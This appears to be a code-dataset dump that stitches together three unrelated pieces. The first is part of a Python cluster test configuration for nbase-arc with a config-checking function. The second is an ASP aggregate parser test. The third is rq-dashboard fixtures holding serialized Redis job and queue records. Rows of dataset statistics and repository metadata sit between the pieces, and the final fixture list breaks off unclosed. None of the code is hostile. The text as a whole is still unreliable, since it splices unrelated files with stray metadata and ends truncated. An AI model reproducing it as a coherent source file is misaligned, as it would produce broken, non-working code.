'real_ip' : '127.0.0.1',
'pm_name' : 'virtual_localhost',
'cm_port' : 1123,
'pg_id' : 0,
'smr_base_port' : 9100,
'smr_mgmt_port' : 9103,
'gateway_port' : 9200,
'gateway_mgmt_port' : 9201,
'redis_port' : 9109,
'zk_port' : 2181,
}
virtual_server21 = {
'id' : 1,
'cluster_name' : 'network_isolation_cluster',
'ip' : '127.0.0.100',
'real_ip' : '127.0.0.1',
'pm_name' : 'virtual_localhost',
'cm_port' : 1123,
'pg_id' : 1,
'smr_base_port' : 9100,
'smr_mgmt_port' : 9103,
'gateway_port' : 9200,
'gateway_mgmt_port' : 9201,
'redis_port' : 9109,
'zk_port' : 2181,
}
virtual_server3 = {
'id' : 2,
'cluster_name' : 'network_isolation_cluster',
'ip' : '127.0.0.100',
'real_ip' : '127.0.0.1',
'pm_name' : 'virtual_localhost',
'cm_port' : 1124,
'pg_id' : 0,
'smr_base_port' : 10100,
'smr_mgmt_port' : 10103,
'gateway_port' : 10200,
'gateway_mgmt_port' : 10201,
'redis_port' : 10109,
'zk_port' : 2181,
}
virtual_server4 = {
'id' : 3,
'cluster_name' : 'network_isolation_cluster',
'ip' : '127.0.0.101',
'real_ip' : '127.0.0.1',
'pm_name' : 'virtual_localhost1',
'cm_port' : 1125,
'pg_id' : 1,
'smr_base_port' : 8110,
'smr_mgmt_port' : 8113,
'gateway_port' : 8210,
'gateway_mgmt_port' : 8211,
'redis_port' : 8119,
'zk_port' : 2181,
}
virtual_server5 = {
'id' : 4,
'cluster_name' : 'network_isolation_cluster',
'ip' : '127.0.0.101',
'real_ip' : '127.0.0.1',
'pm_name' : 'virtual_localhost1',
'cm_port' : 1126,
'pg_id' : 1,
'smr_base_port' : 9110,
'smr_mgmt_port' : 9113,
'gateway_port' : 9210,
'gateway_mgmt_port' : 9211,
'redis_port' : 9119,
'zk_port' : 2181,
}
virtual_server6 = {
'id' : 5,
'cluster_name' : 'network_isolation_cluster',
'ip' : '127.0.0.101',
'real_ip' : '127.0.0.1',
'pm_name' : 'virtual_localhost1',
'cm_port' : 1127,
'pg_id' : 1,
'smr_base_port' : 10110,
'smr_mgmt_port' : 10113,
'gateway_port' : 10210,
'gateway_mgmt_port' : 10211,
'redis_port' : 10119,
'zk_port' : 2181,
}
vm1 = {
'id' : 0,
'cluster_name' : 'no_opinion',
'ip' : '127.0.0.100',
'real_ip' : '127.0.0.1',
'pm_name' : 'virtual_localhost',
'cm_port' : 1122,
'pg_id' : 0,
'smr_base_port' : 8100,
'smr_mgmt_port' : 8103,
'gateway_port' : 8200,
'gateway_mgmt_port' : 8201,
'redis_port' : 8109,
'zk_port' : 2181,
}
vm2 = {
'id' : 1,
'cluster_name' : 'no_opinion',
'ip' : '127.0.0.101',
'real_ip' : '127.0.0.1',
'pm_name' : 'vm2',
'cm_port' : 1123,
'pg_id' : 0,
'smr_base_port' : 9100,
'smr_mgmt_port' : 9103,
'gateway_port' : 9200,
'gateway_mgmt_port' : 9201,
'redis_port' : 9109,
'zk_port' : 2181,
}
vm3 = {
'id' : 2,
'cluster_name' : 'no_opinion',
'ip' : '127.0.0.102',
'real_ip' : '127.0.0.1',
'pm_name' : 'vm3',
'cm_port' : 1124,
'pg_id' : 0,
'smr_base_port' : 10100,
'smr_mgmt_port' : 10103,
'gateway_port' : 10200,
'gateway_mgmt_port' : 10201,
'redis_port' : 10109,
'zk_port' : 2181,
}
clusters = [
# 0
{
'cluster_name' : 'testCluster0',
'keyspace_size' : 8192,
'quorum_policy' : '0:1',
'slots' : [0,8191],
'pg_id_list' : [0],
'servers' : [server1, server2, server3]
},
# 1
{
'cluster_name' : 'testCluster0',
'keyspace_size' : 8192,
'quorum_policy' : '0:1',
'slots' : [0,8191, -1, -1],
'pg_id_list' : [0, 1],
'servers' : [server1, server2, server3, server4, server5, server6]
},
# 2
{
'cluster_name' : 'testCluster0',
'keyspace_size' : 8192,
'quorum_policy' : '0:1',
'slots' : [0,4095,4096,8191],
'pg_id_list' : [0, 1],
'servers' : [server1, server2, server3, server4, server5, server6]
},
# 3
{
'cluster_name' : 'testCluster0',
'keyspace_size' : 8192,
'quorum_policy' : '0:1',
'slots' : [0,8191],
'pg_id_list' : [0],
'servers' : [server1, server2]
},
# 4
{
'cluster_name' : 'testCluster0',
'keyspace_size' : 8192,
'quorum_policy' : '0:1',
'slots' : [0,8191, -1, -1],
'pg_id_list' : [0, 1],
'servers' : [server1, server2, server3, server4, server5, server6]
},
# 5
{
'cluster_name' : 'network_isolation_cluster_1',
'keyspace_size' : 8192,
'quorum_policy' : '0:1',
'slots' : [0,4095,4096,8191],
'pg_id_list' : [0, 1],
'servers' : [virtual_server1, virtual_server2, virtual_server3, server4, server5, server6]
},
# 6
{
'cluster_name' : 'network_isolation_cluster_2',
'keyspace_size' : 8192,
'quorum_policy' : '0:1:2',
'slots' : [0,8191],
'pg_id_list' : [0],
'servers' : [virtual_server1, server2, virtual_server3]
},
# 7
{
'cluster_name' : 'network_isolation_cluster_1_2copy',
'keyspace_size' : 8192,
'quorum_policy' : '0:1',
'slots' : [0,4095,4096,8191],
'pg_id_list' : [0, 1],
'servers' : [server40, virtual_server1, server5, virtual_server21]
},
# 8
{
'cluster_name' : 'no_opinion',
'keyspace_size' : 8192,
'quorum_policy' : '0:1:2',
'slots' : [0,8191],
'pg_id_list' : [0],
'servers' : [vm1, vm2, vm3]
},
# 9
{
'cluster_name' : 'network_isolation_cluster_3',
'keyspace_size' : 8192,
'quorum_policy' : '0:1',
'slots' : [0,4095,4096,8191],
'pg_id_list' : [0, 1],
'servers' : [virtual_server1, virtual_server2, virtual_server3, virtual_server4, virtual_server5, virtual_server6]
},
]
def verify_config():
    """Validate the module-level test configuration, aborting on failure.

    Checks that ``opt_use_memlog`` and ``sudoer`` (module globals set at
    import time) hold usable values; prints a diagnostic and exits the
    process with status -1 when either is missing.

    Fix: the original used Python-2-only ``print`` statements, which are a
    syntax error under Python 3; the single-argument ``print(...)`` form
    below behaves identically on both Python 2 and Python 3. Also replaced
    ``== None`` with the idiomatic identity test ``is None``.
    """
    print("### Verify config ###")
    if opt_use_memlog is None:
        print(" Invalid opt_use_memlog.")
        sys.exit(-1)
    else:
        print(" opt_use_memlog : %s" % opt_use_memlog)
    if sudoer is None:
        print(" Invalid sudoer. Check environmental variable, NBASE_ARC_TEST_SUDOER.")
        sys.exit(-1)
    else:
        print(" sudoer : %s" % sudoer)
| 22.026906
| 118
| 0.586726
| 1,336
| 9,824
| 4.037425
| 0.146707
| 0.01409
| 0.040044
| 0.046719
| 0.784205
| 0.746385
| 0.721542
| 0.721542
| 0.705784
| 0.705784
| 0
| 0.138725
| 0.222211
| 9,824
| 445
| 119
| 22.076404
| 0.567203
| 0.061686
| 0
| 0.719895
| 0
| 0
| 0.434773
| 0.036122
| 0
| 0
| 0
| 0
| 0
| 0
| null | null | 0
| 0.005236
| null | null | 0.013089
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
df65232810db56406272fa6f57032245bce79337
| 369
|
py
|
Python
|
tests/parser/aggregates.sum.assignment.3.test.py
|
veltri/DLV2
|
944aaef803aa75e7ec51d7e0c2b0d964687fdd0e
|
[
"Apache-2.0"
] | null | null | null |
tests/parser/aggregates.sum.assignment.3.test.py
|
veltri/DLV2
|
944aaef803aa75e7ec51d7e0c2b0d964687fdd0e
|
[
"Apache-2.0"
] | null | null | null |
tests/parser/aggregates.sum.assignment.3.test.py
|
veltri/DLV2
|
944aaef803aa75e7ec51d7e0c2b0d964687fdd0e
|
[
"Apache-2.0"
] | null | null | null |
input = """
a(S,T,Z) :- #sum{X: r(T,X)} = Z, #sum{W: p(W,Y)} = S, #sum{K: q(K,S)} = T.
q(1,3).
q(2,4).
r(1,1).
r(1,2).
r(1,3).
r(2,2).
r(3,3).
p(1,1).
p(2,2).
%{out a(3,1,6).
"""
output = """
a(S,T,Z) :- #sum{X: r(T,X)} = Z, #sum{W: p(W,Y)} = S, #sum{K: q(K,S)} = T.
q(1,3).
q(2,4).
r(1,1).
r(1,2).
r(1,3).
r(2,2).
r(3,3).
p(1,1).
p(2,2).
%{out a(3,1,6).
"""
| 10.542857
| 74
| 0.365854
| 110
| 369
| 1.227273
| 0.181818
| 0.088889
| 0.044444
| 0.059259
| 0.918519
| 0.918519
| 0.918519
| 0.918519
| 0.918519
| 0.918519
| 0
| 0.139535
| 0.184282
| 369
| 34
| 75
| 10.852941
| 0.30897
| 0
| 0
| 0.923077
| 0
| 0.076923
| 0.915989
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 10
|
df7c9781349cd9528abcd5047e26bf4014fade55
| 33,579
|
py
|
Python
|
tests/fixtures/rq_1_0.py
|
FlorianPerucki/rq-dashboard
|
81492879f68cb4dadc7dc4685b44d2e3e36c6343
|
[
"BSD-2-Clause-FreeBSD"
] | 436
|
2016-11-30T01:02:35.000Z
|
2019-10-02T06:09:39.000Z
|
tests/fixtures/rq_1_0.py
|
FlorianPerucki/rq-dashboard
|
81492879f68cb4dadc7dc4685b44d2e3e36c6343
|
[
"BSD-2-Clause-FreeBSD"
] | 144
|
2019-10-02T12:20:01.000Z
|
2022-03-30T20:32:03.000Z
|
tests/fixtures/rq_1_0.py
|
FlorianPerucki/rq-dashboard
|
81492879f68cb4dadc7dc4685b44d2e3e36c6343
|
[
"BSD-2-Clause-FreeBSD"
] | 103
|
2016-12-02T05:43:06.000Z
|
2019-09-27T15:05:10.000Z
|
fxt_ready = [
(b'rq:job:bcb5774c-24c6-4d99-a45d-cf9c9d560571', 0, b'\x04\x07\x04data@Ox\x9ck`\x99\xea\xc5\x00\x01\x1a=*\xc9\xf9\xa5y%\xf1\xe5\xf9E)\xc5\xf1i\xa5y\xc9\xc5z\xc8"\x89%\xf1\xa5E9S\xfcz\xc43JJ\n\xac\xf4\xf5S+\x12s\x0brR\xf5\xf2RK\xf4s\xf2\xcb\x8d\xa7\xb4N\xa9\x9dR2E\x0f\x00\xc4\xd5\x1f"\x06origin\x04high\x07timeout\xc1\xb4\x00\x0bdescription\xc3:?\x12count_words_funcs.c\xe0\x02\x11\x1fat_url(\'http://example.net/low3\'\x00)\x0benqueued_at\x1b2019-08-12T20:43:19.606034Z\x06status\x06queued\ncreated_at\x1b2019-08-12T20:43:19.605756Z\x08\x00\x823]\xe9\xcd\\\x0c\x85'),
(b'rq:job:0b8e247a-81f6-4de2-8fde-080a2518b5bc', 0, b'\x04\x07\x04data@Ox\x9ck`\x99\xea\xc5\x00\x01\x1a=*\xc9\xf9\xa5y%\xf1\xe5\xf9E)\xc5\xf1i\xa5y\xc9\xc5z\xc8"\x89%\xf1\xa5E9S\xfcz\xc43JJ\n\xac\xf4\xf5S+\x12s\x0brR\xf5\xf2RK\xf4s\xf2\xcb\x8d\xa6\xb4N\xa9\x9dR2E\x0f\x00\xc4\xcc\x1f!\x06origin\x04high\x07timeout\xc1\xb4\x00\x0bdescription\xc3:?\x12count_words_funcs.c\xe0\x02\x11\x1fat_url(\'http://example.net/low2\'\x00)\x0benqueued_at\x1b2019-08-12T20:43:19.323981Z\x06status\x06queued\ncreated_at\x1b2019-08-12T20:43:19.323621Z\x08\x00]tp\xcc\xb3\xd0<\x13'),
(b'rq:job:fd4c7c24-6a46-465c-a2fa-14f5198725f9', 0, b'\x04\x07\x04data@Ox\x9ck`\x99\xea\xc5\x00\x01\x1a=*\xc9\xf9\xa5y%\xf1\xe5\xf9E)\xc5\xf1i\xa5y\xc9\xc5z\xc8"\x89%\xf1\xa5E9S\xfcz\xc43JJ\n\xac\xf4\xf5S+\x12s\x0brR\xf5\xf2RK\xf4s\xf2\xcb\x8d\xa6\xb4N\xa9\x9dR2E\x0f\x00\xc4\xcc\x1f!\x06origin\x06medium\x07timeout\xc1\xb4\x00\x0bdescription\xc3:?\x12count_words_funcs.c\xe0\x02\x11\x1fat_url(\'http://example.net/low2\'\x00)\x0benqueued_at\x1b2019-08-12T20:43:19.227177Z\x06status\x06queued\ncreated_at\x1b2019-08-12T20:43:19.226935Z\x08\x00G\x94\xa4\xe2lpR\xb4'),
(b'rq:job:91478a7d-9165-43b5-8f5a-f91a37a8feea', 0, b'\x04\x07\x04data@Ox\x9ck`\x99\xea\xc5\x00\x01\x1a=*\xc9\xf9\xa5y%\xf1\xe5\xf9E)\xc5\xf1i\xa5y\xc9\xc5z\xc8"\x89%\xf1\xa5E9S\xfcz\xc43JJ\n\xac\xf4\xf5S+\x12s\x0brR\xf5\xf2RK\xf4s\xf2\xcb\x8d\xa7\xb4N\xa9\x9dR2E\x0f\x00\xc4\xd5\x1f"\x06origin\x03low\x07timeout\xc1\xb4\x00\x0bdescription\xc3:?\x12count_words_funcs.c\xe0\x02\x11\x1fat_url(\'http://example.net/low3\'\x00)\x0benqueued_at\x1b2019-08-12T20:43:19.418265Z\x06status\x06queued\ncreated_at\x1b2019-08-12T20:43:19.418029Z\x08\x00\xc3\xb6M\xad/q\'X'),
(b'rq:queue:medium', 0, b'\x0e\x01@}}\x00\x00\x00V\x00\x00\x00\x03\x00\x00$f9f7c364-3f6d-4326-b724-c6f6983b05bb&$fd4c7c24-6a46-465c-a2fa-14f5198725f9&$1b2b1887-d608-4662-86fa-560d7b575fd0\xff\x08\x00\xd1q3\xab\xb6\xb7\xad\x8c'),
(b'rq:job:1fbc9695-c0a7-4302-8a77-9304ca86057b', 0, b'\x04\x07\x04data@Ox\x9ck`\x99\xea\xc5\x00\x01\x1a=*\xc9\xf9\xa5y%\xf1\xe5\xf9E)\xc5\xf1i\xa5y\xc9\xc5z\xc8"\x89%\xf1\xa5E9S\xfcz\xc43JJ\n\xac\xf4\xf5S+\x12s\x0brR\xf5\xf2RK\xf4s\xf2\xcb\x8d\xa6\xb4N\xa9\x9dR2E\x0f\x00\xc4\xcc\x1f!\x06origin\x03low\x07timeout\xc1\xb4\x00\x0bdescription\xc3:?\x12count_words_funcs.c\xe0\x02\x11\x1fat_url(\'http://example.net/low2\'\x00)\x0benqueued_at\x1b2019-08-12T20:43:19.131776Z\x06status\x06queued\ncreated_at\x1b2019-08-12T20:43:19.131501Z\x08\x00\x93\xa0j\xda\xf9\xf2\xb0\xac'),
(b'rq:queue:low', 0, b'\x0e\x01@}}\x00\x00\x00V\x00\x00\x00\x03\x00\x00$acfa2647-5e40-4510-9e8c-303df1dbc757&$1fbc9695-c0a7-4302-8a77-9304ca86057b&$91478a7d-9165-43b5-8f5a-f91a37a8feea\xff\x08\x00\x17\xa4em\xf4\xf0\xb99'),
(b'rq:job:95ae312d-3ae6-4846-9d9a-c7cdb36254ba', 0, b'\x04\x07\x04data@Ox\x9ck`\x99\xea\xc5\x00\x01\x1a=*\xc9\xf9\xa5y%\xf1\xe5\xf9E)\xc5\xf1i\xa5y\xc9\xc5z\xc8"\x89%\xf1\xa5E9S\xfcz\xc43JJ\n\xac\xf4\xf5S+\x12s\x0brR\xf5\xf2RK\xf4s\xf2\xcb\r\xa7\xb4N\xa9\x9dR2E\x0f\x00\xc4\xc3\x1f \x06origin\x04high\x07timeout\xc1\xb4\x00\x0bdescription\xc3:?\x12count_words_funcs.c\xe0\x02\x11\x1fat_url(\'http://example.net/low1\'\x00)\x0benqueued_at\x1b2019-08-12T20:43:19.035242Z\x06status\x06queued\ncreated_at\x1b2019-08-12T20:43:19.034930Z\x08\x00\xbf\x8eq\x92\xabr\x98 '),
(b'rq:queue:high', 0, b"\x0e\x01@}}\x00\x00\x00V\x00\x00\x00\x03\x00\x00$95ae312d-3ae6-4846-9d9a-c7cdb36254ba&$0b8e247a-81f6-4de2-8fde-080a2518b5bc&$bcb5774c-24c6-4d99-a45d-cf9c9d560571\xff\x08\x00\x15~'\xbf\xeb\x139\xf8"),
(b'rq:job:1b2b1887-d608-4662-86fa-560d7b575fd0', 0, b'\x04\x07\x04data@Ox\x9ck`\x99\xea\xc5\x00\x01\x1a=*\xc9\xf9\xa5y%\xf1\xe5\xf9E)\xc5\xf1i\xa5y\xc9\xc5z\xc8"\x89%\xf1\xa5E9S\xfcz\xc43JJ\n\xac\xf4\xf5S+\x12s\x0brR\xf5\xf2RK\xf4s\xf2\xcb\x8d\xa7\xb4N\xa9\x9dR2E\x0f\x00\xc4\xd5\x1f"\x06origin\x06medium\x07timeout\xc1\xb4\x00\x0bdescription\xc3:?\x12count_words_funcs.c\xe0\x02\x11\x1fat_url(\'http://example.net/low3\'\x00)\x0benqueued_at\x1b2019-08-12T20:43:19.511732Z\x06status\x06queued\ncreated_at\x1b2019-08-12T20:43:19.511490Z\x08\x00\x06\x0b\xa0t\x0ctw\x13'),
(b'rq:job:acfa2647-5e40-4510-9e8c-303df1dbc757', 0, b'\x04\x07\x04data@Ox\x9ck`\x99\xea\xc5\x00\x01\x1a=*\xc9\xf9\xa5y%\xf1\xe5\xf9E)\xc5\xf1i\xa5y\xc9\xc5z\xc8"\x89%\xf1\xa5E9S\xfcz\xc43JJ\n\xac\xf4\xf5S+\x12s\x0brR\xf5\xf2RK\xf4s\xf2\xcb\r\xa7\xb4N\xa9\x9dR2E\x0f\x00\xc4\xc3\x1f \x06origin\x03low\x07timeout\xc1\xb4\x00\x0bdescription\xc3:?\x12count_words_funcs.c\xe0\x02\x11\x1fat_url(\'http://example.net/low1\'\x00)\x0benqueued_at\x1b2019-08-12T20:43:18.841263Z\x06status\x06queued\ncreated_at\x1b2019-08-12T20:43:18.840834Z\x08\x00\x8bSL\x85\xeco\x99\xa0'),
(b'rq:queues', 0, b'\x02\x03\x0frq:queue:medium\x0crq:queue:low\rrq:queue:high\x08\x00-\x1cw\x14lM\xc4\x1c'),
(b'rq:job:f9f7c364-3f6d-4326-b724-c6f6983b05bb', 0, b'\x04\x07\x04data@Ox\x9ck`\x99\xea\xc5\x00\x01\x1a=*\xc9\xf9\xa5y%\xf1\xe5\xf9E)\xc5\xf1i\xa5y\xc9\xc5z\xc8"\x89%\xf1\xa5E9S\xfcz\xc43JJ\n\xac\xf4\xf5S+\x12s\x0brR\xf5\xf2RK\xf4s\xf2\xcb\r\xa7\xb4N\xa9\x9dR2E\x0f\x00\xc4\xc3\x1f \x06origin\x06medium\x07timeout\xc1\xb4\x00\x0bdescription\xc3:?\x12count_words_funcs.c\xe0\x02\x11\x1fat_url(\'http://example.net/low1\'\x00)\x0benqueued_at\x1b2019-08-12T20:43:18.942075Z\x06status\x06queued\ncreated_at\x1b2019-08-12T20:43:18.941830Z\x08\x00\xb2XL\xdd\xfd.\x9a\xf8'),
]
fxt_some_failed = [
(b'rq:job:bcb5774c-24c6-4d99-a45d-cf9c9d560571', 0, b'\x04\x07\x04data@Ox\x9ck`\x99\xea\xc5\x00\x01\x1a=*\xc9\xf9\xa5y%\xf1\xe5\xf9E)\xc5\xf1i\xa5y\xc9\xc5z\xc8"\x89%\xf1\xa5E9S\xfcz\xc43JJ\n\xac\xf4\xf5S+\x12s\x0brR\xf5\xf2RK\xf4s\xf2\xcb\x8d\xa7\xb4N\xa9\x9dR2E\x0f\x00\xc4\xd5\x1f"\x06origin\x04high\x07timeout\xc1\xb4\x00\x0bdescription\xc3:?\x12count_words_funcs.c\xe0\x02\x11\x1fat_url(\'http://example.net/low3\'\x00)\x0benqueued_at\x1b2019-08-12T20:43:19.606034Z\x06status\x06queued\ncreated_at\x1b2019-08-12T20:43:19.605756Z\x08\x00\x823]\xe9\xcd\\\x0c\x85'),
(b'rq:job:91478a7d-9165-43b5-8f5a-f91a37a8feea', 0, b'\x04\x07\x04data@Ox\x9ck`\x99\xea\xc5\x00\x01\x1a=*\xc9\xf9\xa5y%\xf1\xe5\xf9E)\xc5\xf1i\xa5y\xc9\xc5z\xc8"\x89%\xf1\xa5E9S\xfcz\xc43JJ\n\xac\xf4\xf5S+\x12s\x0brR\xf5\xf2RK\xf4s\xf2\xcb\x8d\xa7\xb4N\xa9\x9dR2E\x0f\x00\xc4\xd5\x1f"\x06origin\x03low\x07timeout\xc1\xb4\x00\x0bdescription\xc3:?\x12count_words_funcs.c\xe0\x02\x11\x1fat_url(\'http://example.net/low3\'\x00)\x0benqueued_at\x1b2019-08-12T20:43:19.418265Z\x06status\x06queued\ncreated_at\x1b2019-08-12T20:43:19.418029Z\x08\x00\xc3\xb6M\xad/q\'X'),
(b'rq:job:1fbc9695-c0a7-4302-8a77-9304ca86057b', 0, b'\x04\x07\x04data@Ox\x9ck`\x99\xea\xc5\x00\x01\x1a=*\xc9\xf9\xa5y%\xf1\xe5\xf9E)\xc5\xf1i\xa5y\xc9\xc5z\xc8"\x89%\xf1\xa5E9S\xfcz\xc43JJ\n\xac\xf4\xf5S+\x12s\x0brR\xf5\xf2RK\xf4s\xf2\xcb\x8d\xa6\xb4N\xa9\x9dR2E\x0f\x00\xc4\xcc\x1f!\x06origin\x03low\x07timeout\xc1\xb4\x00\x0bdescription\xc3:?\x12count_words_funcs.c\xe0\x02\x11\x1fat_url(\'http://example.net/low2\'\x00)\x0benqueued_at\x1b2019-08-12T20:43:19.131776Z\x06status\x06queued\ncreated_at\x1b2019-08-12T20:43:19.131501Z\x08\x00\x93\xa0j\xda\xf9\xf2\xb0\xac'),
(b'rq:clean_registries:high', 889, b'\x00\xc0\x01\x08\x00\x9fU\x0b\tx\x18\x9b\xc4'),
(b'rq:worker:198c9f1ad12e44daaab9ed2b5deb15bf', 46, b'\r\xc3@\xca@\xec\x04\xec\x00\x00\x00\xce \x03\x1f\x12\x00\x00\x05birth\x07\x1b2019-08-12T20:47:54.8\x1647727Z\x1d\x0elast_heartbeat\x10\xe0\r,\x1f70410Z\x1d\x06queues\x08\x06medium\x08\x03pid\x05\xc0\xe94\x04\x1f\x08hostname\n\x08parabook\n\x05state\x07\x04idle\x1f\x06\x10failed_job_count\x12\xf2\x02\x12total_work\x14ing_time\x14\x080.001561\n\x05d \x8e\xe0\x0f\xbc\x0670804Z\xff\x08\x00\x14b\xce\xdfqRr\xc5'),
(b'rq:clean_registries:low', 880, b'\x00\xc0\x01\x08\x00\x9fU\x0b\tx\x18\x9b\xc4'),
(b'rq:job:95ae312d-3ae6-4846-9d9a-c7cdb36254ba', 0, b'\x04\n\ncreated_at\x1b2019-08-12T20:43:19.034930Z\nstarted_at\x1b2019-08-12T20:47:58.642547Z\x04data@Ox\x9ck`\x99\xea\xc5\x00\x01\x1a=*\xc9\xf9\xa5y%\xf1\xe5\xf9E)\xc5\xf1i\xa5y\xc9\xc5z\xc8"\x89%\xf1\xa5E9S\xfcz\xc43JJ\n\xac\xf4\xf5S+\x12s\x0brR\xf5\xf2RK\xf4s\xf2\xcb\r\xa7\xb4N\xa9\x9dR2E\x0f\x00\xc4\xc3\x1f \x07timeout\xc1\xb4\x00\x06status\x06failed\x08ended_at\x1b2019-08-12T20:47:58.644125Z\x06origin\x04high\x0bdescription\xc3:?\x12count_words_funcs.c\xe0\x02\x11\x1fat_url(\'http://example.net/low1\'\x00)\x0benqueued_at\x1b2019-08-12T20:43:19.035242Z\x08exc_infoA\x0bx\x9c\xb5\x92=O\xc30\x10\x86\xf7\xfe\x8aS\xa7\xb4Jb\xa1\xf2\x11\x90\x18Aba\x829r\x9cKk\xe2\xd8\xe1\xceN\xe9\xbf\xc7I\xf8\xc8\xc0X6\xbf\xf6\xdd=\x8fN~!\xa9\xb0\x92\xaa\x85\xa4s\xec\x81P\xa1\xf5\xa0\xa41`$\xfb\xcd\xdd\n\xe0Q\x1b\x84\xb5xe$\x16CO\xceKv\x83\xc8\x07\xb4\x83\xa0\xf7\xac\x96|\xa8\x9c\xa4:\xdb\xe57\xc2\xe8J\xf4\'\x7fpvL\xac=f}\x04\xc8=r,\x16GG-R\xde\x9f\xd6)\x18m\x11\x8a\x8b]\n\xdaB\x8f\xd48\xea\xca7WE&\x00\rp\x0f1\xe4_\x0f\xc9\xe6\xdc*\xd3\xf0\x1f\x8f\xab\xa2XzL\x0e\x8c\xa6\xc9KB\x0e\xc6G\x9b9\xe2\x07\xaa\xe0\xf1\xdf}n/\'\x9fo\xde\xbc\x14\xf4\x81\xec,\xd2\x04\xab\x92\xedt\x94\xb4\xe7\x14\xb6sh\x8fc\xfc\xb5\xcb\x85r\xc1\xfa2n\xbe\xe6r\xec\xe2\x05\xe6z\x82,+\xa4/\x03\x99\x19\'5#<;\xff\xd4\xf5\x06\xbb\xf85\xb0~ r\xb4\xfa\xeb\xee\x13\xbd\xa2\xc8o\x08\x00\xa7\x7f\x8f\xfa\xc7\xdf\xc9\xaf'),
(b'rq:job:f9f7c364-3f6d-4326-b724-c6f6983b05bb', 0, b'\x04\n\ncreated_at\x1b2019-08-12T20:43:18.941830Z\nstarted_at\x1b2019-08-12T20:47:54.862943Z\x04data@Ox\x9ck`\x99\xea\xc5\x00\x01\x1a=*\xc9\xf9\xa5y%\xf1\xe5\xf9E)\xc5\xf1i\xa5y\xc9\xc5z\xc8"\x89%\xf1\xa5E9S\xfcz\xc43JJ\n\xac\xf4\xf5S+\x12s\x0brR\xf5\xf2RK\xf4s\xf2\xcb\r\xa7\xb4N\xa9\x9dR2E\x0f\x00\xc4\xc3\x1f \x07timeout\xc1\xb4\x00\x06status\x06failed\x08ended_at\x1b2019-08-12T20:47:54.864504Z\x06origin\x06medium\x0bdescription\xc3:?\x12count_words_funcs.c\xe0\x02\x11\x1fat_url(\'http://example.net/low1\'\x00)\x0benqueued_at\x1b2019-08-12T20:43:18.942075Z\x08exc_infoA\x0bx\x9c\xb5\x92=O\xc30\x10\x86\xf7\xfe\x8aS\xa7\xb4Jb\xa1\xf2\x11\x90\x18Aba\x829r\x9cKk\xe2\xd8\xe1\xceN\xe9\xbf\xc7I\xf8\xc8\xc0X6\xbf\xf6\xdd=\x8fN~!\xa9\xb0\x92\xaa\x85\xa4s\xec\x81P\xa1\xf5\xa0\xa41`$\xfb\xcd\xdd\n\xe0Q\x1b\x84\xb5xe$\x16CO\xceKv\x83\xc8\x07\xb4\x83\xa0\xf7\xac\x96|\xa8\x9c\xa4:\xdb\xe57\xc2\xe8J\xf4\'\x7fpvL\xac=f}\x04\xc8=r,\x16GG-R\xde\x9f\xd6)\x18m\x11\x8a\x8b]\n\xdaB\x8f\xd48\xea\xca7WE&\x00\rp\x0f1\xe4_\x0f\xc9\xe6\xdc*\xd3\xf0\x1f\x8f\xab\xa2XzL\x0e\x8c\xa6\xc9KB\x0e\xc6G\x9b9\xe2\x07\xaa\xe0\xf1\xdf}n/\'\x9fo\xde\xbc\x14\xf4\x81\xec,\xd2\x04\xab\x92\xedt\x94\xb4\xe7\x14\xb6sh\x8fc\xfc\xb5\xcb\x85r\xc1\xfa2n\xbe\xe6r\xec\xe2\x05\xe6z\x82,+\xa4/\x03\x99\x19\'5#<;\xff\xd4\xf5\x06\xbb\xf85\xb0~ r\xb4\xfa\xeb\xee\x13\xbd\xa2\xc8o\x08\x00R\x88\x9f\xc5<\xf1\xfc\xb6'),
(b'rq:job:0b8e247a-81f6-4de2-8fde-080a2518b5bc', 0, b'\x04\x07\x04data@Ox\x9ck`\x99\xea\xc5\x00\x01\x1a=*\xc9\xf9\xa5y%\xf1\xe5\xf9E)\xc5\xf1i\xa5y\xc9\xc5z\xc8"\x89%\xf1\xa5E9S\xfcz\xc43JJ\n\xac\xf4\xf5S+\x12s\x0brR\xf5\xf2RK\xf4s\xf2\xcb\x8d\xa6\xb4N\xa9\x9dR2E\x0f\x00\xc4\xcc\x1f!\x06origin\x04high\x07timeout\xc1\xb4\x00\x0bdescription\xc3:?\x12count_words_funcs.c\xe0\x02\x11\x1fat_url(\'http://example.net/low2\'\x00)\x0benqueued_at\x1b2019-08-12T20:43:19.323981Z\x06status\x06queued\ncreated_at\x1b2019-08-12T20:43:19.323621Z\x08\x00]tp\xcc\xb3\xd0<\x13'),
(b'rq:failed:high', 0, b'\x0c77\x00\x00\x000\x00\x00\x00\x02\x00\x00$95ae312d-3ae6-4846-9d9a-c7cdb36254ba&\xd0\xfe\x033_\xff\x08\x008\x18\xea\xd9B\x16\xcd\x10'),
(b'rq:job:fd4c7c24-6a46-465c-a2fa-14f5198725f9', 0, b'\x04\x07\x04data@Ox\x9ck`\x99\xea\xc5\x00\x01\x1a=*\xc9\xf9\xa5y%\xf1\xe5\xf9E)\xc5\xf1i\xa5y\xc9\xc5z\xc8"\x89%\xf1\xa5E9S\xfcz\xc43JJ\n\xac\xf4\xf5S+\x12s\x0brR\xf5\xf2RK\xf4s\xf2\xcb\x8d\xa6\xb4N\xa9\x9dR2E\x0f\x00\xc4\xcc\x1f!\x06origin\x06medium\x07timeout\xc1\xb4\x00\x0bdescription\xc3:?\x12count_words_funcs.c\xe0\x02\x11\x1fat_url(\'http://example.net/low2\'\x00)\x0benqueued_at\x1b2019-08-12T20:43:19.227177Z\x06status\x06queued\ncreated_at\x1b2019-08-12T20:43:19.226935Z\x08\x00G\x94\xa4\xe2lpR\xb4'),
(b'rq:queue:medium', 0, b'\x0e\x01@WW\x00\x00\x000\x00\x00\x00\x02\x00\x00$fd4c7c24-6a46-465c-a2fa-14f5198725f9&$1b2b1887-d608-4662-86fa-560d7b575fd0\xff\x08\x00\xa1Y\x8e\xa3L\xde}\xfa'),
